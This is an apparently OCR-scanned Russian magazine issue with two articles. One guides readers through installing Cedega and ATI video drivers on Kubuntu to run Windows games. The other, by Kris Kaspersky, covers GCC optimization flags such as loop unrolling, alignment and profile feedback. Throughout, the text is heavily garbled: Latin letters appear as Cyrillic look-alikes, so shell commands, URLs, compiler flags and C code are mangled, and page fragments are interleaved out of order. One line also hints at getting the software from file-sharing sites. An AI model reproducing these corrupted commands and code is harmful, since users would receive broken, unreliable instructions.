СЕРЕСА: РЕШЕНИЕ ДЛЯ ЗАПУСКА ѴѴІЫР0ѴѴ5-ИГР ПОД І_ІЫЦХ 



Сейчас для Ілпих существует достаточно приложений, чтобы решить львиную долю пов- 
седневных задач. Что же тебе мешает захлопнуть форточки и оставить на компе одного 
пингвина? Правильно, игры. Именно игры привлекают многочисленную армию пользо- 
вателей, но, к сожалению, большинство из них написано исключительно под ѴѴІпсІоѵѵз. 
Но, надеюсь, с сегодняшнего дня проблем с этим у тебя уже не возникнет. У французов 
слово себе§а ассоциируется с сортом винограда, а нам с тобой оно открывает возмож- 
ность запуска ѴѴІпсІоѵѵз-игр. 



а ПРОЕКТ СЕРЕСА 

Если гора не идет к Магомету, то, как известно, Магомет идет к горе. Так как 
непросто завлечь разработчиков игр и программ в мир Ыпих.то исправить 
ситуацию пробуют путем эмуляции программного интерфейса. Сегодня 
известно множество эмуляторов, распространяемых по лицензии 0Р1_: 
сіозети — МБ 005; Судѵѵіп, ѴѴіпе — ѴѴіпсІоѵѵз; А64 — Атіда; 5пез9х — Бирег 
Ыіпіепсіо; Бресіети — 2Х5рес{гит ит.д. Ксожалению, настройка боль- 
шинства из них — дело нетривиальное, требующее правки конфигурацион- 
ных файлов и чтения документации до полного просветления. Не каждый 
решится на такой подвиг, особенно когда нет полной уверенности в том, что 
любимая контра вообще сможет запуститься. 

По прошествии вотуже 14 лет разработок ѴѴіпе хотя и оброс большим 
количеством возможностей, но так и не стал панацеей. Да, чудеса 



случаются: чтобы установить ВаШебеШ 1 942, мне было достаточно вы- 
брать в меню Копциегог пункт «Запустить с помощью» и указать ѴѴіпе. 
Игра инсталлировалась без проблем, но на этом все приятные момен- 
ты, в общем -то, закончились. Запускалась она минут 10, а игровой 
процесс напоминал охоту за человеком -невидим кой, так как по экрану 
двигались какие-то тени. Кстати, в КІІЬипіи 7.04, в подменю Абѵапсесі 
центра «Настройки системы», появился новый пункт«Программы 
ѴѴіпсІоѵѵз», являющийся по сути еще одним вариантом ѵѵіпесід. С его 
помощью можно указать некоторые настройки ѴѴіпе, но до полного 
комфорта еще далеко. 

Вероятно, поэтому большей популярностью пользуются коммерческие реше- 
ния, которые построены на основе исходных кодов ѴѴіпе ( ѵѵѵѵѵѵ.ѵѵіпеЬд.согп ) и 
позволяют запускать в І_іпих многие приложения, написанные для ѴѴіпсІоѵѵз. 



► 096 
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ІРеІигп Іо СазИе ѴѴоІ^епзІеіп в ЫпихІ 



,еньги вперед; 



Целых 9 лет (до начала 2002 года) ѴѴіпе выходил под лицензией МІТ, которая 
разрешала одностороннее использование открытого кода без каких-либо 
обязательств публиковать изменения. Впоследствии разработчики ѴѴіпе 
выбрали болеежесткую в этом отношении 6РІ_, но проектам, стартовавшим 
в 2001 году, этот шаг помешать уже никакие мог. 

Коммерческие решения отличаются более понятным обычному поль- 
зователю графическим средством настройки и более узкой специали- 
зацией. Так, основное направление СгоззОѵег (ранее СгоззОѵег 0№се, 
ѵѵѵѵѵѵ.собеѵѵеаѵегз.сот ] — поддержка наиболее востребованных офисных 
приложений, вроде Місгозоіі СЖісе, І_оІиз Ыоіез, Масгогпесііа Огеатѵѵеаѵег 
и РІазЬ МХ, АбоЬе РЬо!озЬор, хотя поддерживаются и некоторые игры (Наіі- 
ЫТе, Соип!ег-3!гіке, ѴѴогІб о! ѴѴагсга!!). Кстати, в январе этого года была 
представлена еще одна версия — Сгоззоѵег Мае, позволяющая запускать 
ѴѴіпсІоѵѵз-приложения на компьютерах Арріе с процессорами Іп!еІ. Специа- 
лизация Себеда (ранее ѴѴіпеХ, ѵѵѵѵѵѵТгапзаатіпа.сот ] понятна даже без 
упоминания названия компании-разработчика Тгапзбатіпд ТесЬпоІодіез 
— игры. 

Официальный список игр, поддерживаемых Себеда, еще три года 
назад перевалил за три сотни. Сейчас он насчитывает около 1300 игр 
( ігапзаатіпа.ога/ааптезбЬ ). некоторые, правда, поддерживаются 
лишь частично, но все равно в этой области Себеда вне конкуренции. 
Чтобы остаться на плаву, разработчики следятза новинками, тестиру- 
ют и улучшают работу с наибоее популярными играми. Отмечается, что 
многие игры работают в Себеда также быстро, как и в родной ОС. Для 
этого добавлена более качественная поддержка АРІ ОігесіХ. Знает 
Себеда и о некоторых технологиях защиты от копирования, применяе- 
мых в современных играх. В последней версии 6.0 появился новый 
менеджер памяти, улучшена работа с АІ_5А (теперьМтар и Отіх могут 
работать вместе, а значит, можно играть и слушать музыку одновре- 
менно), решена куча проблем, и, естественно, увеличился список 
официально поддерживаемых игр: Ыееб РогЗрееб: СагЬоп; Маббеп 
2007; ВаШебеІб 2142. 

Весь процесс установки, обновления и удаления игр осуществляется 
через единый центр управления с понятным интерфейсом. И, кстати, для 
работы Себеда (и СгоззОѵег) наличиеустановленной ѴѴіпбоѵѵз совершенно 
необязательно. Официально поддерживаются дистрибутивы Веб На!/ 
Ребога, 51І5Е, Мапбгіѵа, ОеЬіап, ІІЬипіи, Кпорріх, Меріз, Ыпбоѵѵз, Сепіоо и 
Зіаскѵѵаге. 

Себеда распространяется по подписке, которая, помимо возможности 
получения новых версий программы и права на суппорт (в течение времени 
действия подписки), позволяетучаствовать в голосовании, определяющем, 
над поддержкой каких игр в дальнейшем следует работать разработчикам. 
Стоимость ежемесячной подписки — 5 у. е., годовая подписка обойдется в 55 у. 
е. По окончании подписки программой можно пользоваться неограниченное 



время, но обновлять ее уже нельзя. Кстати, Себеда доступна и в некоторых 
дистрибутивах максимальной оснащенности, например в Мапбгіѵа І_іпих 
2007 ОІ5соѵегу и РоѵѵегРаск. 

Естьеще один вариантполучения Себеда (о Рапиде и подобных сервисах 
я уже не говорю). Дело втом, чтоТгапзѲатіпд открывает часть исходного 
кода, выкладывая его в свободный доступ через СѴ5 ( ігапзаатіпа.огд/сѵз ). 
таким образом привлекая сторонних программистов кнаписанию патчей. 
Однако в СѴЗ-версии ты не найдешь графического интерфейса и еще ряда 
разработок, принадлежащихТгапзбатіпд. Лицензия Аіаббіп Ргее РиЫіс 
І_ісепзе (АРРЦ на условиях которой опубликованы исходники, не разре- 
шает использование исходных текстов с целью извлечения какой бы то ни 
было выгоды. Причем условия подобной лицензии могутвлюбой момент 
измениться, в свое время это стало причиной того, что разработчики 6еп!оо 
и ОеЬіап отказались включать пакеты с СѴ5 Себеда в репозитарии своих 
дистрибутивов. 

Щ НАСТРАИВАЕМ ЗР 

Для работы Себеда 6.0 потребуется ОС І_іпих с ядром 2.4 и выше, видеокар- 
та класса пѴібіа ѲеРогсе, 60 Мб свободного места на жестком диске плюс 
дополнительное место для установки игр. Поддерживаются как32-,таки 
64-битные версии систем. В последнем случае сначала нужно установить 
32-битные версии библиотек для совместимости. В некоторых дистрибу- 
тивах І_іпих можно сразу приступать кустановке Себеда. Ріо в КІІЬипІи мне 
предстояла настройка поддержки бігес! гепбегіпд для своего НАОЕОІ\І Х800 
СТО, иначе вся эта затея попросту не имела смысла. Воттак можно прове- 
рить работоспособность: 

$ діхіпбо I дгер гепсіегіпд 

Ыігесб гепсіегіпд: N0 

Какя упоминал выше, мне не повезло. Нельзя сказать, что ситуация с драйве- 
рамидля Радеона в Ыпихтяжелая, она, скорее, запутанная. Дело втом, чтоб 
списке на странице аІі.атб.сот/зиррогі/бгіѵег.ЬігпІ ты найдешьдрайвертолько 
для самых последних видеокарт, а он по известному всем закону может взять 
и не установиться. Нонестоитунывать. Во-первых, попробуй запустить одну 
из более ранних версий драйвера (доступны на аб.атб.сот/зиррогі/бгіѵегз/ 
Ііпих/габеопргеѵіоиз-Ііпих.ЫппІ ). Например, поддержка карт Рабеоп 8500-9250, 
МоЬіІііу Рабеоп 9000/9100/9200 и Рабеоп ЮР 9000/91 00/9200 имеется в версии 
8.28.8, поэтому в данном случае версии с большим номером бесполезны. Еслиу 
тебя еще больший раритет, то придется обратиться корепзоигее проектам. Так, 
для своего прежнего Радеона 7000 я использовал драйверы проекта йРІ (бгі. 
Ігеебезкіор.ога ). благо их включают в репозитарии практически всех дистрибу- 
тивов, поэтому выполнять сборку вручную, скорее всего, не понадобится. Кроме 
карт АТІ разрабатываются драйверы и для старых версий Маіхох, пѴібіа 5і5 и 
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Для установки свободных драйверов в /еіс/арі/зоигсез.іізі: должен быть 
подключен гезітісіесі-репозитарий. Теперь обновляем список и устанавли- 
ваем нужные пакеты: 

$ зисіо арб-деЦ ирсіабе 

$ зисіо арб-деЬ іпзбаіі 1іпих-гезЬгісЬесі-то<іи1е5-$ (ипаше 
-г) хогд-сігіѵег-ТдІгх 
$ зисіо сіертосі -а 

Переконфигурируем сервер, выбрав драйвер (дігх: 

$ зисіо сіркд-гесопіідиге хзегѵег-хогд 



$ зисіо тосІиІе-аззізЬаіИ: ргераге 
$ зисіо тосіиІе-аззізЬапЬ ирсіаЬе 
$ зисіо тосіиІе-аззізЬапЬ Ьиіісі Тдігх 
$ зисіо тосіиІе-аззізЬапЬ іпзбаіі Тдігх 

С ядром 2.6.20-15 модуль собираться отказался. Дело пошло, только когда я 
его обновил до 2.6.20-16. Теперь настраиваем драйвер: 

$ зисіо акісопіід --іпіріаі 

Эта команда также не имела успеха, а прибегать к варианту с '--Тогсе' не 
было никакого желания. Поэтому пришлось открыть хогд.сопі и в секции 
йеѵісе поменять аб на Ідігх (сігіѵег «ідігх»). 

После этого убиваем X (<СігІ-А11;- Васкзрасе>) , загружаем модули: 

$ зисіо сіершосі -а 
И проверяем: 

$ діхіпбо I дгер гепсіегіпд 
сіігесР гепсіегіпд: Уез 



$ зисіо ЪазЬ. аЬі-сігіѵег-іпзРаІІег- 
8.38.6 -х8 б . х8 б_б 4 . гип --Ьиіісіркд Шипки/ 
Теізку 

В текущем каталоге появится несколько сіеб-пакетов, уста- 
навливаем все: 

$ зисіо сіркд — і . / * . сіеЪ 

Чтобы не было конфликтов со свободным драйвером, вно- 
сим следующее изменение: 

$ зисіо тсесіік /ебс/сіебаиір/ііпих- 




С сайта АТІ (или с прилагаемого к журналу диска] забираем драйвер под 
свою карточку (в моем случае это аб-бгіѵег-іп5{а11ег-8.38.6-х86.х86_64.гип) 
и загружаем пакеты, необходимые для сборки модуля ядра: 

$ зисіо арб-дек іпзкаіі шосіиіе-аззізкапк Ьиіісі- еззепкіаі 
Такегоок Ыі-шаке ЬеЫіеІрег ЬеЬсопТ 
1іЪзксіс++5 Ііпих-Ьеасіегз-депегіс 



Отлично, а еще: 

$ кдігхіпко 

сіізріау: : 0 . О зсгееп: 0 

ОрепСЬ ѵепсіог зкгіпд: АТІ Тесітоіодіез Іпс. 






Выполняем сборку: 
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Как выполнить сборку, описано на ѵѵѵѵѵѵ.ііпих-аагпегз.пеі . Мы же будем 
разбираться с файлом, полученным по подписке. Для установки доступно 
несколько вариантов пакетов (РРМ, йЕВ и Т62], следуетлишь выбрать 
подходящий для своего дистрибутива. Для ОеЫап/ОЬипШ это себеда- 
5таи_6.0_аІІ.беЬ: 

$ зікбо сіркд -і се<беда-зша11_б . 0_а11 . йеЬ 

Команда зибо арЬсасЬе берепбз себеда-згпаіі выдаетсписокзависимос- 
тей и рекомендаций, причем в ІбЬипІи, с ее мягкой системой зависимостей, 
устанавливаются не все из них. Поэтому обязательно посмотри наличие 
следующих пакетов: ІіЬсб, хІіЬтезаЗ (или ІіЬдІІ ), руіЬоп, рубзоп-д1к2, 
руіЛоп-д1.абе2, ѵѵдеі, рубіоп2.4-бЬиз. 

Но это еще не все, что требуется для работы Себеда. Мы установили только 
графическую оболочку, которая сама по себе бесполезна. Запускаем 
Себеда, выбрав пунктТгапзбатіпд Себеда в меню или введя себеда в кон- 
соли. Принимаем лицензионное соглашение и попадаем в объятия Себеда 
5еЕир ѴѴігагб, задача которого — помочь нам в настройке. Чтобы установить 
движок Себеда, тебя попросят ввести учетные данные для доступа к сайту 
Тгапзбатіпд. Если утебя уже есть локальная копия файла себеда-епдіпе- 
6.0*.і386.сркд, то просто нажми кнопку Іпзіаіі Босаі Раскаде и укажи на 
него. Здесь опять попросят принять лицензию. В следующем окне будет 
проанализировано железо и выдан результат. Протестировать работоспо- 
собность всех компонентов можно на следующем шаге, для этого отмечаем 
все флажки и жмем Пип Зеіесіеб Тезі. Все тесты должны быть пройдены. 
Красный цвет напротив хотя бы одного теста означает, что вероятность 
дальнейшего успеха быстро стремится к нулю. 

^ СТАВИМ ИГРЫ 

По прошествии всех пунктов перед нами предстанет основное окно про- 
граммы. Поумолчанию интерфейс Себеда сугубо английский, но его очень 
просто локализовать. Выбираем «Ебіі -> Еапдиаде Рге^егепсег», нажимаем 
кнопку Іпз1:аЦ и получаем с сервера Тгапзбатіпд список доступных локали- 
заций. Выбираем «Іосаіе — ги». В моем случае эта запись стояла первой в 
списке. Нажимаем ОК и перезапускаем Себеда. Теперь можно переходить к 
установке игр. 

Несмотря на все удобства интерфейса, ставить игрушку часто бывает на 
порядоктруднее, чем саму Себеда. Может повезти сразу, и все заработает 
без какого-либо дополнительного вмешательства, а может выясниться, 
что именно эта игра именно с этими патчами именно на этой видеокарте 
не запустится, как не проси. Кслову, Себеда поддерживает аж 3 варианта 
запуска игр. Самый простой — если игрушка уже установлена. Тогда пере- 
ходим в каталоге исполняемым файлом и запускаем: 

$ сесіеда . /МоІГЗР .ехе 

ПеШгп Іо СазЛе ѴѴоІіепзІеіп сдался сразу, без каких-либо других указаний 
и экзекуций. В некоторых случаях следует указать дополнительные пара- 
метры. Например, ‘-ѵѵіпѵег’ позволитуказать эмулируемую версию ѴѴіпбоѵѵз 
(ѵѵіп95, ѵѵіп98, п140, ѵѵіпЗбІ , ѵѵіпте, ѵѵіп2к, ѵѵіпхр). Некоторые игры очень 



привередливы в этом вопросе, можно почерпнуть нужную информацию на 
сайте проекта или попробовать подобрать настройки вручную. 

Аналогично можно установить игру Соип1:ег5і:гіке. Просто вводим себеда 
аиіюгип.ехе, после чего начнется обычная для ѴѴіпбоѵѵз процедура уста- 
новки. В процессе тебя спросят, куда следует установить игру, и предложат 
что-то вроде С:\Ргодгат РіІез\ѴаІѵе. Беспокоиться не стоит, это означает, 
что на самом деле игра будет установлена в ~/Тгапз6атіпд_0гіѵе/Ргодгат 
РіІез\ѴаІѵе. Такая структура нужна для эмуляции необходимых для ѴѴіпбоѵѵз 
каталогов, чтобы программа чувствовала себя в пингвине какдома. Если 
перейти в каталог ~-/Тгапз6атіпд_0гіѵе, то можно оказаться в маленькой 
Винде. Здесь будут каталоги ѴѴіпбоѵѵз, Му йоситеп^з и Ргодгат Рііез, внут- 
ри которыхты найдешьустановленные программы и библиотеки. Однако 
это еще не все. В особо конфликтных ситуациях можно добавить параметр 
іпзіаіі с указанием имени каталога. В этом случае программа установит- 
ся в ее собственную рабочую среду и будет исполняться в собственной 
копии эмулятора. После установки игру можно запускать из консоли или 
используя 6111. Да, и главное: если программа установлена в раздел ЫТР5, а 
драйвер или параметры монтирования не позволяютзапись.то при первой 
же попытке что-либо сохранить игра вывалится с ошибкой. 

Установку программ проще производить именно из 6111. Для начала 
следует создать отдельную папку с играми, чтобы они не размеща- 
лись в одной большой куче. Выбираем «Сервис -> Папки с играми -> 
Добавить» и вводим название игры. Теперь выбираем «Установить» 
и начинаем заполнять параметры. В поле «Папка с игрой» указыва- 
ем созданную для этой игры папку. Счень повезет, если игра будет в 
списке 600 В. Тогда для нее будут автоматически подобраны рабо- 
чие установки, а во вкладках «Общие», «Играть», «Установить» и АН 
выведены подсказки (естественно, на английском). Если установка 
производится с диска, следует нажать кнопки «Монтировать» и «Оп- 
ределить диск с игрой». При установке с жесткого диска жмем кнопку 
«Найти» и указываем на установочный файл. Теперь можно давить на 
кнопку «Продолжить». 

Если все прошло нормально, настраиваем игру и наслаждаемся. В против- 
ном случае следует обратиться к подменю «Дополнительно». Нажимаем 
кнопку «Редактировать параметры установки» и приступаем кустранению 
проблем. Здесь 4 вкладки: «Общие», «Звук», «Графика» и «Джойстики». Во 
вкладке «Общие» указываем версию ѴѴіпбоѵѵз. Если не знаешь, какую вы- 
брать, ориентируйся по времени выхода игры. Для игр начала века смело 
выбирай ѴѴіп98, для современных — ѴѴіпХР. Назначение остальных вкладок, 
думаю, понятно. 

Конечно, Себеда не может полностью решить проблему игр в Бтих. Это 
произойдет, только когда игровая индустрия обратит внимание на эту ось. 
Ното, что использование эмуляции все же лучше, чем вообще ничего, — это 
факт. Л инуксоиды имеют возможность поиграть в свои любимые игры уже 
сейчас, нс 
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КРИС КАСПЕРСКИІ 



К омпиляция 
на фо рсаж е 
с т у р бона ддувом 



ИЗУЧАЕМ КЛЮЧИ ОПТИМИЗАЦИИ КОМПИЛЯТОРА 6СС 



В оптимизации гораздо больше магии, чем науки. Компилятор ССС поддерживает сотни 
ключей оптимизации, влияние большинства из которых на быстродействие программы 
весьма неоднозначно: в одном случае мы получаем колоссальный прирост производи- 
тельности, в другом же — обвальное падение. Причем чем агрессивнее ведет себя опти- 
мизатор, тем выше шансы, что откомпилированная программа с треском развалится. 
Поэтому разработчики, как правило, оставляют солидный «запас прочности» по опти- 
мизации, позволяющий нам (не без риска, конечно) форсировать ключи компиляции, 
увеличивающие скорость работы программы в несколько раз. 



аверное, всем известно, что компилятор 6СС поддерживает 
несколько уровней оптимизации (01 — минимальная, 02 
— умеренная, 03 — агрессивная), но не каждый догадывается, 
что даже на уровне 03 задействуются далеко не все режи- 
мы оптимизации и до максимальной производительности еще пилить и 
пилить. 

Однако забить все ключи в командную строку недостаточно. Если бы все 
было так просто, разработчики компилятора уже давно бы сделали это за 
нас. В погоне за производительностью очень легко вылететь с трассы и 
свалиться в глубокую яму. Не думаю, что кому-либо с первой попытки удас- 
тся подобрать нужную комбинацию ключей оптимизации с правильными 
параметрами. Тутэкспериментировать нужно! И желательно не вслепую, 



а осмысленно, то есть зная устройство процессора и принцип работы 
оптимизатора. 

Разумеется, в рамках короткой журнальной статьи мыщъх не в силах 
рассказать обо всех ключах компилятора и потому вынужден остановиться 
лишь на самых проблемныхтехниках оптимизации, не описанных ни в до- 
кументации на 6СС, нив популярных РАО. Заинтересованных в углублении 
своих знаний мыщъх отсылает к книге «Техника оптимизации: эффективное 
использование памяти» и к серии статей «Техника оптимизации под І_іпих», 
электронные версии которых можно скачать с ЬирУ/пегиті.огд.ги/ 
орбтігабоп.гір и ЬирѴ/пегиті.огд.ги/орбтігабоп-раск.гір соответственно. 
Ну а мы сейчас отправимся в орбитальный полет. Главным образом мы 
будем говорить о самой последней версии 6СС — 4.2.1 (описание которой 
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Страничка в ѴѴікі ресііа, посвященная 6СС 

можно найти на Ьир://асс.апи.ога/опІіпесІос5/асс-4.2.1/асс 1. что же касает- 
ся остальных версий, то... сверяйся с документацией! 

^ РАЗВОРОТ ЦИКЛОВ 

Процессоры семейства Іпіеі Репбигп и АМй АіЫоп построены на кон- 
вейерной архитектуре, и в некотором смысле их можно уподобить гоночной 
машине, которая мощно несется по прямой дороге, но конкретнотормозит 
на виражах. 

Циклы (особенно компактные] содержат небольшой участок линейного 
кода, за которым следует крутой поворот, тормозящий процессор и не даю- 
щий ему как следует разогнаться. Последние модели Репіит 4, благодаря 
значительным архитектурным улучшениям, намного лучше справляются 
с циклами, чем процессоры предыдущих поколений, но потери в скорости 
все равно оченьзначительны, и для повышения производительности необ- 
ходимо расчиститьтрассу ответвлений, что может сделатьлибо програм- 
мист, либо компилятор. 

Циклы, состоящие из нескольких команд Мог(а = 0; а < п; а++] *сІ5І++ = 
*5гс++;»), исполняются очень медленно, и для повышения быстродействия 
оптимизаторы задействуют технику, именуемую разворотом циклов (Іоорз 
ипгоШпд), в процессе которой происходит многократное дублирование тела 
цикла, реализуемое приблизительнотак: 

ЦИКЛ ДО РАЗВОРОТА 

бог (і = 1; і < п; і + +) 
к += (п % і) ; 

ЦИКЛ ПОСЛЕ РАЗВОРОТА 

// Разворот цикла на 4 итерации; 

// выполняем первые п — (п % 4) итераций 
бог(і = 1 ; і < п; і += 4) 



Официальный сайт разработчиков компилятора ОСС 

после чего производительность упадеттак, что не поднимешь и домкратом. 
Компилятор 6СС разворачивает циклы только при использовании ключа 
‘-{ипгоИ-кюрз' (действует применительно к циклам типа бог] или ‘-іцпгоіі- 
аіі-іоорз’ (как и следует из названия, развертывание выполняется для всех 
видов циклов, например бо/ѵѵЫІе]. 

Если постоянное количество итераций, известное на стадии компиляции, 
не превышает32,то циклы разворачиваются полностью. При значении, 
большем 32, кратность разворота сокращается до приблизительно 4 (точное 
значение зависит от размера цикла, смотри ключи ’тах-аѵегаде-ипгоііесі- 
іпзпз' и ‘тах-ипгоіі-іітез’). Циклы с неизвестным количеством итераций 
не разворачиваются вообще! Хотя другие компиляторы (такие, например, 
ка к I пбеі С++) их преспокойно разворачивают. 

Для тонкой настройки оптимизатора существуют следующие ключи (зада- 
ются с помощью конструкции «--рагат кеу=ѵа1ие»]: 

•’тах-ипгоІІесІ-іпзпБ’— максимальное количество инструкций, при котором 
цикл может быть развернут; оптимальное значение зависит какоттипа про- 
цессора, так и от конструктивных особенностей компилируемой программы, 
поэтому определять это значение приходится экспериментальным путем; 
мыщъх рекомендует начинать «плясать» оттах-ипгоІІесі-іп5П5=69; 
•’тах-аѵегаде-ипгоііесі-іпзпз’— максимальное оценочное количество 
инструкций, которое цикл будет иметь после разворота; это число также 
подбирается экспериментальным путем, возьми за стартзначение 96; 
•'тах-ипгоіі-бтез'— максимальная степень разворота, поумолчанию 
равная 4; это довольно разумноезначение, но в некоторых случаях выбор 2 
или 8 существенноувеличиваетбыстродействие программы. 

Остальные ключи, связанные с разворотом циклов, описаны в документа- 
ции на 6СС. Они не имеют решающегозначения, и потому кним прибегают 
только умудренные опытом гуру, да и то лишь время от времени. 

г ВЫРАВНИВАНИЕ 



{ 

к += (п % і) + \ 

(п % і + 1) + \ 

(п % і + 2) + \ 

( п % і + 3 ) ; 

} 

// Выполняем оставшиеся итерации 
бог ( і = 4 ; і < п; і++) к += (п % і) ; 

Размер программы при этом, естественно, возрастает, а вместе с ним воз- 
растает и риск вылететь за пределы кэша первого (и даже второго!) уровня, 



Вплотьдо появления Репбигп Рго процессоры крайне болезненно относи- 
лись к невыровненным переходам и вызовам функций, чей адрес не был 
кратен 4 байтам, и давали за это штрафныетакты (называемые «пеналь- 
ти»), что объяснялось несовершенством микропроцессорной архитектуры 
тех лет. 

Начиная с Репііит 11+ и АМО К6+, процессоры уже не требуют посто- 
янного выравнивания переходов/вызова функций, за исключением 
случая, когда целевая инструкция или команда перехода, пересекая 
границу линейки кэш-памяти первого уровня, расщепляется напопо- 
лам, за что выдается пенальти. Причем Репбшп 4, компилирующий 
х86-инструкции в микрокод, выдает его значительно реже и совер- 
шенно непредсказуемым образом — микроинструкции абсолютно 
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ипіхоій 




дсс(1 ) — справочная тап-страница 




6СС 3.3.5 с патчем Ргороіісе 




> ІП^О 

Для всехтипов 
процессоров вырав- 
нивание переходов 
и метоклучше всего 
отключить, а функ- 
ции выравнивать на 
величину от4 до 
32 байт (опти- 
мальное значение 
подбирается 
экспериментально]. 




> СІѴСІ 

На прилагаемом к 
журналу дискеты 
найдешь ОСС 4.2.1 и 
полную версию этой 
статьи, включающую 
сводную таблицу 
ключей оптимизации. 



недокументированы, их длина неизвестна, следовательно, 
управлять их выравниванием мы не можем. 

Несмотря на то что Репбшп 4 де-факто является самым по- 
пулярным процессором и непоколебимым лидером рынка, 
большинство компиляторов упорно продолжаетзаниматься 
выравниванием, располагая инструкции перехода по крат- 
ным адресам и заполняя образующиеся дыры незначащими 
инструкциями, такими как ЫОР, МОѴ ЕАХ.ЕАХ и другие. 
Естественно, это увеличивает размер кода, снижая его 
производительность. 

Применительно к Репбит I І/Репіі и т Ши АМй К6+ машин- 
ная команда требует выравнивания только в тех случаях, 
когда следующее условие становится истинным: ((асісіг % 
сасбе_1еп + БІіеоЦорв]) > сасЬе_1еп]. Здесь асісіг — линей- 
ный адрес инструкции, сасбе_1еп — размер кэш-линейки 
(в зависимости оттипа процессора равный 32, 64 или 
1 28 байтам], орз — целевая машинная инструкция или 
инструкция перехода/вызова функции. Количество вы- 
равнивающих байт рассчитывается по формуле (сасЬе_1еп 
— (асісіг % сасЬе_1еп)]. 

Компилятор Іпіеі С++ вообще не выравнивает ни переходы, 
ни циклы, что является лучшей стратегией для Репбит 4, а 
вот на более ранних процессорах мы получаем неустойчивый 
код с плавающей производительностью, быстродействие 
которого зависит оттого, расщепляются ли глубоко вложенные 
переходы или нет. А это, в свою очередь, зависит от множества 
трудно прогнозируемых обстоятельств, включая фазу луны и 
количество осадков. 

Компилятор 6СС задействует выравниваниеуже на уровне 
оптимизации 02, автоматически отключая его при задании 
ключа ’-Оз’ (оптимизация размера программы), причем осу- 
ществляет его по ужасно бездарной схеме. Вышеприведенная 
формула остается незадействованной. Функции, циклы, метки 
(ІаЬеІз) иусловные переходы выравниваются по фиксирован- 
ной границе, управляемой следующими ключами: ’-ІаІідп- 
{ипсбопз’, ‘-{аіідп-іоорз’, -баіідп-іа Ьеіз’ и ‘-(аіідп-щтрз’ 
соответственно. 

Каждый ключ принимает целочисленный аргумент, равный 
степени двойки и задающий кратность выравнивания. Напри- 
мер, ‘-^аІідп-1 : ипс1;іопз=32’ форсируетвыравнивание функций 
по границе32 байт. Значение 1 отключаетвыравнивание, а О 
задаетвыравнивание поумолчанию, специфичное для этого 
типа процессора. 

Для Репііит 4 все виды выравнивания лучше всего отклю- 
чить, естественно, убедившись, что это не вызовет падения 
производительности. Для остальных процессоров имеет 
смысл задействовать выравнивание циклов по величине, 



кратной 4 байтам, однако в некоторых случаях отключение вы- 
равнивания позволяетувеличить производительность на 30%. 

В КОМПИЛЯЦИЯ С ОБРАТНОЙ СВЯЗЬЮ 

Техника оптимизации тесно связана с черной магией, астро- 
логией и прочим колдовством. Ведь для генерации эффектив- 
ного кода компилятор вынужден заниматься спекулятивными 
предсказаниями, пытаясь определить частоту срабатываний 
условных переходов, приблизительные значения аргументов, 
переданных функциями и т.д. и т.п. Естественно, техника пред- 
сказаний далека отсовершенства, и компилятор очень часто 
ошибается. В результате мы имеем плавающую производи- 
тельность и другие радости. 

Настоящий прорыв произошел, когда разработчики догада- 
лись объединить профилировщик (инструмент для измерения 
производительности) с оптимизатором. В результате полу- 
чился компилятор с обратной связью, которому уже не нужно 
гадать на кофейной гуще: стоитли разворачивать цикл или нет 
— достаточно просто перебрать все возможные значения и, 
проанализировав информацию, возвращенную профилиров- 
щиком, выбрать оптимальную кратность разворота. 
Компилятор 6СС поддерживает компиляцию с обратной 
связью, но не использует ее даже на самых агрессивных 
уровнях оптимизации, хотя она уже давно вышла из экспери- 
ментальной стадии и готова к промышленному применению. 
Так почему же мы до сих пор вынуждены задействовать ее 
вручную?! Ответпрост: во-первых, использование профи- 
лировщика многократноувеличивает время компиляции, и 
сборка многих «серьезных» проектов растягивается более чем 
на сутки (сюрприз, да?). Во-вторых, информация, получен- 
ная по обратной связи, завязана на конкретную аппаратную 
конфигурацию, и для других процессоров результат, скорее 
всего, окажется совершенно иным (то есть бинарные сборки, 
откомпилированные подобным образом, лучше использовать 
только для себя и не распространять). Наконец, в-третьих, 
большинство программ львиную долю машинного времени 
тратит на ввод/вывод и достигает максимальной скорости 
своего выполнения уже на уровне 02, после чего прирост 
быстродействия можно обнаружить разве что хронометром. 
Тем не менее, для экстремалов и любителей поэксперимен- 
тировать компиляция с обратной связью открываетогромные 
возможности, которыми грех не воспользоваться. 

Ключ ’-ІргобІе-изе' задействует обратную связь (ргоТіІе 
{еебЬаск] и оказывает воздействие на следующие ключи 
оптимизации, которые обязательно должны бытьуказаны в 
командной строке (или заданы уровнем оптимизации от 01 до 
03], иначе вместо ожидаемого выхлопа мы получим «пшик»: 
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•^ипгоіі-іоорз' — разворот циклов будет выполняться на оптимальное ко- 
личество итераций или не будет выполняться вообще, если для конкретно 
взятого цикла это невыгодно; 

• Трееі-Іоорз' — «шелушение циклов» (разновидность разворота) будет 
выполняться в соответствии с показаниями профилировщика; 

• іѵрЕ — заставляетпрофилировщикзапоминатьзначения переменных, 
собираемые походу выполнения программы, которые в дальнейшем могут 
быть использованы для более эффективной оптимизации; 
•‘ІЪгапсЬ-ргоЬаЬіІібез’ — в комбинации с ключом ’-ІѵрГ форсирует подсчет 
частоты каждого условного перехода, записывая полученные данные в 
файл зоигсепате.дссіа, после чего оптимизатор сможет реорганизовать 
код таким образом, чтобы сократить накладные расходы на ветвления 

и уменьшить трассу выполнения (примечание: втекущих версиях ОСС 
оптимизатор ограничивается лишьболее эффективным распределением 
переменных по регистрам, но даже это дает существенный прирост 
производительности); 

•’Лгасег — форсируетхвостовую дубликацию (іаіі сі и ріісаііоп) — довольно 
прогрессивный и, кстати говоря, запатентованный метод оптимиза- 
ции, подробнее о котором можно прочитать на ѵѵѵѵѵѵТгеераіепІБОпІіпе. 
сот/200501 83079. біті . 

Ключ ’-ІргобІе-депегаІе’ задействует дополнительные возможности, 
заставляя профилировщиксобирать еще больше данных, что позволяет 
использовать следующие ключи оптимизации: 

•‘Іргобіе-агсз’ — собирает информацию о ходе выполнения программы, 
записывая ее в АУХЫАМЕ.сІа, и воздействует на следующие ключи оптими- 
затора, позволяющие генерировать более эффективный код: ‘-(по-диезз- 
Ьгапсб-ргоЬаЬіІйу', ‘-ІЪгапсЬ-ргоЬаЬіІШез’ и ‘-ІтеогсІег-і'ипсбопБ’ — все 
эти ключи автоматически задействуются на уровнях оптимизации от 02 и 
выше, а потому нет никакой необходимости дописывать их вручную; 
•Чргобіе-ѵаіиез' — в комбинации с ключом ‘-Іргойіе-агсз’ форсируетсбор 
значений переменных и выражений, позволяя отыскивать инварианты (то 
естьзначения, независимые отобрабатываемых программой данных) и 
оптимизировать процедуру вычисления многих вещественных выражений. 
Текущие версии ОССтолько начинают осваивать компиляцию с обратной 
